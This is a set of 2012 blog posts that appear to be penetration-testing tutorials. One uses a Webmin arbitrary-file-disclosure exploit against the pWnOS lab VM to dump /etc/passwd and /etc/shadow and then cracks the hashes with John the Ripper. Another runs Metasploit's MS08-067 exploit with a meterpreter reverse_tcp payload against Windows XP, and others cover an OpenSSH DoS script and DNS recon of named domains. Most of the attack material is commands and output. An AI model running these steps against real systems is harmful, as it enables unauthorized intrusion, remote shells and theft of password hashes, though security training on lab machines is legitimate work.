This is default featured slide 1 title

Go to Blogger edit html and find these sentences.Now replace these sentences with your own descriptions.

This is default featured slide 2 title

Go to Blogger edit html and find these sentences.Now replace these sentences with your own descriptions.

This is default featured slide 3 title

Go to Blogger edit html and find these sentences.Now replace these sentences with your own descriptions.

This is default featured slide 4 title

Go to Blogger edit html and find these sentences.Now replace these sentences with your own descriptions.

This is default featured slide 5 title

Go to Blogger edit html and find these sentences.Now replace these sentences with your own descriptions.

Tuesday, January 31, 2012

How to Crack LInux Password Using John the Ripper

We have get /etc/passwd and /etc/shadow in the last article Privilege Escalation (Step by Step to get Linux username and Password) in Backtrack 5

Now we try to crack it. The first step is save the two files in txt files. In this case we will save /etc/passwd in pasword.txt and /etc/shadow in shadow.txt.

Then combine the two files by using ./unshadow command.


root@bt:/pentest/passwords/john# ./unshadow pasword.txt shadow.txt >> crack.txt
root@bt:/pentest/passwords/john# ./jhon-mmx crack.txt


The next step is crack the crack.txt using john

root@bt:/pentest/passwords/john# john crack.txt
Loaded 5 password hashes with 5 different salts (FreeBSD MD5 [32/32])
guesses: 0  time: 0:00:00:47 25.23% (2) (ETA: Wed Feb  1 10:23:59 2012)  c/s: 3943  trying: olivier9

Privilege Escalation (Step by Step to get Linux username and Password) in Backtrack 5

1. Information Gathering  Step

A. Using Zenmap

Out IP target is 192.168.0.21
 We have known the running service sssh, http, and netbios 

B. Open our taeget via web browser
Because the http service is running we will try to open it via browser
We can try to follow how the web site work.

The try to change the GET parameter. In this case we change the "true" parameter in address bar. and the error message is appeared.  
From the error message, we have know that the file of this web is placed in var/www/ and the name of this file is index1.php.

 2. Service Enumeration Step
From the Zenmap we have known the running service and the port that have used. We can get dept info about the service by using Nessus. 
Fill the IP address of the target and choose the Internal Network Scan for intranet target.
We have known the running service and the vulnerability level. For the detail we can click the service..
 3. Vulnerability Assesment
 From the detail we can analyze the vulnerability of the service. After that, we can choose and try to exploit it. In ths case we choose the port 10000 / http for exploiting. 
From the detail we can know that the webmin version used is before 1.296 and the usermin is below 1.226.
4. Exploit using exploitdb
Open it via K-menu - Apps - Exploitation Tool -  Open Source Exploitation - Exploitdb - expoitdb directory. 
Then search the exploitation script from the database by typing ./searchsploit webmin. We can use the following script for the exploitation.
root@bt:/pentest/exploits/exploitdb# ./searchsploit webmin
Description Path
--------------------------------------------------------------------------- -------------------------
Webmin BruteForce and Command Execution Exploit /multiple/remote/705.pl
Webmin Web Brute Force v1.5 (cgi-version) /multiple/remote/745.cgi
Webmin BruteForce + Command Execution v1.5 /multiple/remote/746.pl
Webmin < 1.290 / Usermin < 1.220 Arbitrary File Disclosure Exploit /multiple/remote/1997.php
Webmin < 1.290 / Usermin < 1.220 Arbitrary File Disclosure Exploit (perl) /multiple/remote/2017.pl
phpMyWebmin 1.0 (window.php) Remote File Include Vulnerability /php/webapps/2451.txt
phpMyWebmin 1.0 (window.php) Remote File Include Vulnerability /php/webapps/2451.txt
phpMyWebmin <= 1.0 (target) Remote File Include Vulnerabilities /php/webapps/2462.txt
phpMyWebmin <= 1.0 (target) Remote File Include Vulnerabilities /php/webapps/2462.txt
phpMyWebmin <= 1.0 (target) Remote File Include Vulnerabilities /php/webapps/2462.txt

Because our target vulnerability is in webmin application and the version is below 1.296 we can try for the following script..
Webmin < 1.290 / Usermin < 1.220 Arbitrary File Disclosure Exploit /multiple/remote/1997.php
Webmin < 1.290 / Usermin < 1.220 Arbitrary File Disclosure Exploit (perl) /multiple/remote/2017.pl

In this case we try to use Webmin < 1.290 / Usermin < 1.220 Arbitrary File Disclosure Exploit (perl) /multiple/remote/2017.pl to get username in our Linux application target.

To use this script we can type  perl 2017.pl

root@bt:/pentest/exploits/exploitdb/platforms/multiple/remote# perl 2017.pl
Usage: 2017.pl <url> <port> <filename> <target>
TARGETS are
0 - > HTTP
1 - > HTTPS
Define full path with file name
Example: ./webmin.pl blah.com 10000 /etc/passwd

We have known how to use it by typing perl 2017.pl <url> <port> <filename> <target>

We can type based on our target perl 2017.pl 192.168.0.21 10000 /etc/passwd 0. Our IP target is 192.168.0.21 and the port target is 10000.

With this script we can view file target in our computer.. 
Now we can try to view web application file in /var/www/
root@bt:/pentest/exploits/exploitdb/platforms/multiple/remote# perl 2017.pl 192.168.0.21 10000 /var/www/ 0
WEBMIN EXPLOIT !!!!! coded by UmZ!
Comments and Suggestions are welcome at umz32.dll [at] gmail.com
Vulnerability disclose at securitydot.net
I am just coding it in perl 'cuz I hate PHP!
Attacking 192.168.0.21 on port 10000!
FILENAME: /var/www/

FILE CONTENT STARTED
-----------------------------------
<HTML>
<body>
<center><h1>Welcome to the pWnOS homepage!
</h1></center>

<p>This is the help page. If you would like help, click the next button below.</p>
<p>
<button style="width:65;height:65" onClick="window.location='index1.php?help=true&connect=true'"><b>Next</b></button>
</p>

-------------------------------------
root@bt:/pentest/exploits/exploitdb/platforms/multiple/remote# perl 2017.pl 192.168.0.21 10000 /var/www/index2.php 0
WEBMIN EXPLOIT !!!!! coded by UmZ!
Comments and Suggestions are welcome at umz32.dll [at] gmail.com
Vulnerability disclose at securitydot.net
I am just coding it in perl 'cuz I hate PHP!
Attacking 192.168.0.21 on port 10000!
FILENAME: /var/www/index2.php

FILE CONTENT STARTED
-----------------------------------
<html><body>
<p><b>HAHAHAHA!
<?php
echo $_GET['name'] . ", for a " . $_GET['level'] . " you REALLY SUCK!";


?>
</p>
<br>
<p>
<a href=index1.php?help=true&connect=true>Want to try again?</a>

</p>

</body>
</html>

-------------------------------------
root@bt:/pentest/exploits/exploitdb/platforms/multiple/remote# perl 2017.pl 192.168.0.21 10000 /var/www/index1.php 0
WEBMIN EXPLOIT !!!!! coded by UmZ!
Comments and Suggestions are welcome at umz32.dll [at] gmail.com
Vulnerability disclose at securitydot.net
I am just coding it in perl 'cuz I hate PHP!
Attacking 192.168.0.21 on port 10000!
FILENAME: /var/www/index1.php

FILE CONTENT STARTED
-----------------------------------
<?php

?>
<HTML>
<body>
<center><h1>Welcome to the pWnOS homepage!
</h1></center>

<p>This is the official help page. If you're too big of a n00b to figure this out, enter your information below for a small hint. :)</p>

<?php

//if($_GET['help'] == 'true'){
include('ssiaddon.php');
//}

if($_GET['connect'] != 'true'){
include($_GET['connect']);
}

?>

</body>
</HTML>

-------------------------------------
root@bt:/pentest/exploits/exploitdb/platforms/multiple/remote# perl 2017.pl 192.168.0.21 10000 /var/www/ssiaddon.php 0
WEBMIN EXPLOIT !!!!! coded by UmZ!
Comments and Suggestions are welcome at umz32.dll [at] gmail.com
Vulnerability disclose at securitydot.net
I am just coding it in perl 'cuz I hate PHP!
Attacking 192.168.0.21 on port 10000!
FILENAME: /var/www/ssiaddon.php

FILE CONTENT STARTED
-----------------------------------
<form name="form" method="GET" action="index2.php">
<table border=1>
<tr><td width=175>
Name:
</td>
<td width=175>
<input type = "text" name="name" size=25>
</td>
<td>&nbsp;</td>
<td>&nbsp;</td>
</tr>
<tr>
<td>
Skillz:
</td>
<td width=175><input type = "radio" name = "level" value="n00b">n00b</td>
<td width=175><input type = "radio" name = "level" value="sk1ll3d n00b">sk1ll3d n00b</td>
<td width=175><input type = "radio" name = "level" value = "l33t hax0r">l33t hax0r</td>
</tr>
<tr><td width=175>
<input type = "submit" name = "submit" value = "Please Help!">
</td>
<td>&nbsp;</td>
<td>&nbsp;</td>
<td>&nbsp;</td>
</tr>

</table>
</form>



-------------------------------------

To get username and password in Linux operating system we can try to view /etc/passwd.
root@bt:/pentest/exploits/exploitdb/platforms/multiple/remote# perl 2017.pl 192.168.0.21 10000 /etc/passwd 0
WEBMIN EXPLOIT !!!!! coded by UmZ!
Comments and Suggestions are welcome at umz32.dll [at] gmail.com
Vulnerability disclose at securitydot.net
I am just coding it in perl 'cuz I hate PHP!
Attacking 192.168.0.21 on port 10000!
FILENAME: /etc/passwd

FILE CONTENT STARTED
-----------------------------------
root:x:0:0:root:/root:/bin/bash
daemon:x:1:1:daemon:/usr/sbin:/bin/sh
bin:x:2:2:bin:/bin:/bin/sh
sys:x:3:3:sys:/dev:/bin/sh
sync:x:4:65534:sync:/bin:/bin/sync
games:x:5:60:games:/usr/games:/bin/sh
man:x:6:12:man:/var/cache/man:/bin/sh
lp:x:7:7:lp:/var/spool/lpd:/bin/sh
mail:x:8:8:mail:/var/mail:/bin/sh
news:x:9:9:news:/var/spool/news:/bin/sh
uucp:x:10:10:uucp:/var/spool/uucp:/bin/sh
proxy:x:13:13:proxy:/bin:/bin/sh
www-data:x:33:33:www-data:/var/www:/bin/sh
backup:x:34:34:backup:/var/backups:/bin/sh
list:x:38:38:Mailing List Manager:/var/list:/bin/sh
irc:x:39:39:ircd:/var/run/ircd:/bin/sh
gnats:x:41:41:Gnats Bug-Reporting System (admin):/var/lib/gnats:/bin/sh
nobody:x:65534:65534:nobody:/nonexistent:/bin/sh
dhcp:x:100:101::/nonexistent:/bin/false
syslog:x:101:102::/home/syslog:/bin/false
klog:x:102:103::/home/klog:/bin/false
mysql:x:103:107:MySQL Server,,,:/var/lib/mysql:/bin/false
sshd:x:104:65534::/var/run/sshd:/usr/sbin/nologin
vmware:x:1000:1000:vmware,,,:/home/vmware:/bin/bash
obama:x:1001:1001::/home/obama:/bin/bash
osama:x:1002:1002::/home/osama:/bin/bash
yomama:x:1003:1003::/home/yomama:/bin/bash

-------------------------------------
We have known that the username of the OS target is obama, osama, and oyama...
Then we have to get password in /etc/shadow 
root@bt:/pentest/exploits/exploitdb/platforms/multiple/remote# perl 2017.pl 192.168.0.21 10000 /etc/shadow 0
WEBMIN EXPLOIT !!!!! coded by UmZ!
Comments and Suggestions are welcome at umz32.dll [at] gmail.com
Vulnerability disclose at securitydot.net
I am just coding it in perl 'cuz I hate PHP!
Attacking 192.168.0.21 on port 10000!
FILENAME: /etc/shadow

FILE CONTENT STARTED
-----------------------------------
root:$1$LKrO9Q3N$EBgJhPZFHiKXtK0QRqeSm/:14041:0:99999:7:::
daemon:*:14040:0:99999:7:::
bin:*:14040:0:99999:7:::
sys:*:14040:0:99999:7:::
sync:*:14040:0:99999:7:::
games:*:14040:0:99999:7:::
man:*:14040:0:99999:7:::
lp:*:14040:0:99999:7:::
mail:*:14040:0:99999:7:::
news:*:14040:0:99999:7:::
uucp:*:14040:0:99999:7:::
proxy:*:14040:0:99999:7:::
www-data:*:14040:0:99999:7:::
backup:*:14040:0:99999:7:::
list:*:14040:0:99999:7:::
irc:*:14040:0:99999:7:::
gnats:*:14040:0:99999:7:::
nobody:*:14040:0:99999:7:::
dhcp:!:14040:0:99999:7:::
syslog:!:14040:0:99999:7:::
klog:!:14040:0:99999:7:::
mysql:!:14040:0:99999:7:::
sshd:!:14040:0:99999:7:::
vmware:$1$7nwi9F/D$AkdCcO2UfsCOM0IC8BYBb/:14042:0:99999:7:::
obama:$1$hvDHcCfx$pj78hUduionhij9q9JrtA0:14041:0:99999:7:::
osama:$1$Kqiv9qBp$eJg2uGCrOHoXGq0h5ehwe.:14041:0:99999:7:::
yomama:$1$tI4FJ.kP$wgDmweY9SAzJZYqW76oDA.:14041:0:99999:7:::





Now we got the encrypted password, we can cracked it using privilege escalation tool is backtrack.. 

Read ....   How to crack password with John the Ripper in Backtrack 5 





Friday, January 27, 2012

Using Nessus For Vulnerability Analysis and Xploitdb for Exploitation

1. Scan host that have been connected to the network by using zenmap
2. Define the target for the vulnerability analysis.
3. Open Nesuss by typing https://127.0.0.1:8834/ at the browser address bar
4, Create new case and type the address of the target..
5. Click Launch Scan

6. Choose which service that have high severenity



7. Click it for detail information

8.  Open xploitdb in Apps-Exploitation Tools-Open Source Exploitation-Expoit-DBexpoitdb-directory.
9. Search the exploit script by typing  ./searchsploit openssh to search explotaion script for openssh

10. Define which one will be used
11. For example we will use 2444.sh fo DoS Exploit, see the detail script by typing

cat platforms/multiple/dos/2444.sh

12. You will see, how to run this script 
( #
# usage: script <hostname>)

13. Type ./2444.sh 192.168.1.145


How to Exploit Windows XP using Metasploit and Nessus

In this tutorial we use Windows XP in Virtual Machine. We assumed that we have known the IP target. Here the onnection between Windows XP as target and LInux...
Picture 1. IP Linux : 192.168.1.144

 Picture 2. IP Windows: 192.168.1.145

 Picture 3. Checking Windows Connection in LInux  

 Picture 4. Checking LInux Connection in Windows 

Now, we try to analyze the vulnerability of the target using Nesus. So, open Nessus, Click tab scan, click add.

Then write name of the case, type : Run Now, Policy : Internal Network Scan, Scan Target : (Fill this with IP target in this case is 192.168.1.145), then cluck Launch Scan.
     Picture 5. Adding Scan Target

You can see the list of Vulnerabiity. 

  Picture 6. Adding Scan Target

To make it more focus in exploiting, you can filter it by clicking "Show Filter". Then check "Exploits Exist"

Picture 7. Filters

Now we have less number of vulnerability, click it...

Picture 8. The list of port of filtering vulnerability

You will see picture 9.

Picture 9. The list of filtering vulnerability

We have two kind of vulnerabilities in port 445, choose the high severity one. You will see the detail information e.g. about description and solution of the vulnerability, See the header in the plugin name : MS08-067..., we will use this number for metasploit.

Picture 10. The list detail information about vulnerability

Now we will start to exploit the system..
Open the metasploit system in terminal and type "msfconsole" and wait untill it is Opened,,,  
Picture 11. The first view of metasploit

Use exploit based on the plugin name by typing msf > use exploit/windows/smb/ms08_067_netapi...
Picture 12

Because the vulnerability is in the port TCP (445), type 
set PAYLOAD windows/meterpreter/reverse_tcp
Then define the host 192.168.1.144 
set LHOST 192.168.1.144
and the target 192.168.1.145 
set RHOST 192.168.1.145
Execution exploit with command
exploit

 Picture 13
Enter the smd of the Windows system by typing 
execute -f cmd.exe -M -i
Now you enter in the Windows system and can run commad via command prompt. 
For example we run "dir" to see the list of the directory
Picture 14

Picture 15

Picture 16


Picture 17


Wednesday, January 25, 2012

Information Gathering for Sites


A. domain : is2c-dojo.net

1. Using dmitry

root@bt:/home# dmitry -wnsepb is2c-dojo.net
Deepmagic Information Gathering Tool
"There be some deep magic going on"

HostIP:216.239.32.21
HostName:is2c-dojo.net

Gathered Inic-whois information for is2c-dojo.net
---------------------------------
Domain Name: IS2C-DOJO.NET
Registrar: CV. JOGJACAMP
Whois Server: whois.resellercamp.com
Referral URL: http://www.resellercamp.com
Name Server: PARTNERIT1.EARTH.ORDERBOX-DNS.COM
Name Server: PARTNERIT1.MARS.ORDERBOX-DNS.COM
Name Server: PARTNERIT1.MERCURY.ORDERBOX-DNS.COM
Name Server: PARTNERIT1.VENUS.ORDERBOX-DNS.COM
Status: clientTransferProhibited
Updated Date: 22-dec-2011
Creation Date: 22-dec-2011
Expiration Date: 22-dec-2012

 2. Using Maltego

 B. domain : is2c-dojo.com
2. using dnsenum
root@bt:/pentest/enumeration/dns/dnsenum# ./dnsenum.pl is2c-dojo.com
dnsenum.pl VERSION:1.2.2

-----   is2c-dojo.com   -----                                                            
                                                                                         
                                                                                         
Host's addresses:                                                                        
__________________                                                                       
                                                                                         
is2c-dojo.com                            14400    IN    A        67.222.154.106          

                                                                                         
Name Servers:                                                                            
______________                                                                           
                                                                                         
ns1.partnerit.us                         5742     IN    A        67.222.154.106          
ns2.partnerit.us                         5742     IN    A        67.222.154.107

                                                                                         
Mail (MX) Servers:                                                                       
___________________                                                                      
                                                                                         
aspmx.l.google.com                       35       IN    A        74.125.47.27            

                                                                                         
Trying Zone Transfers and getting Bind Versions:                                         
_________________________________________________                                        
                                                                                         
                                                                                         
Trying Zone Transfer for is2c-dojo.com on ns2.partnerit.us ...
AXFR record query failed: NOERROR

ns2.partnerit.us Bind Version: #9.3.6-P1-RedHat-9.3.6-16.P1.el5_7.1

Trying Zone Transfer for is2c-dojo.com on ns1.partnerit.us ...
AXFR record query failed: NOERROR

ns1.partnerit.us Bind Version: #9.3.6-P1-RedHat-9.3.6-16.P1.el5_7.1

brute force file not specified, bay.
  C. domain : spentera.com
1. Using Maltego 

2. Using domaintools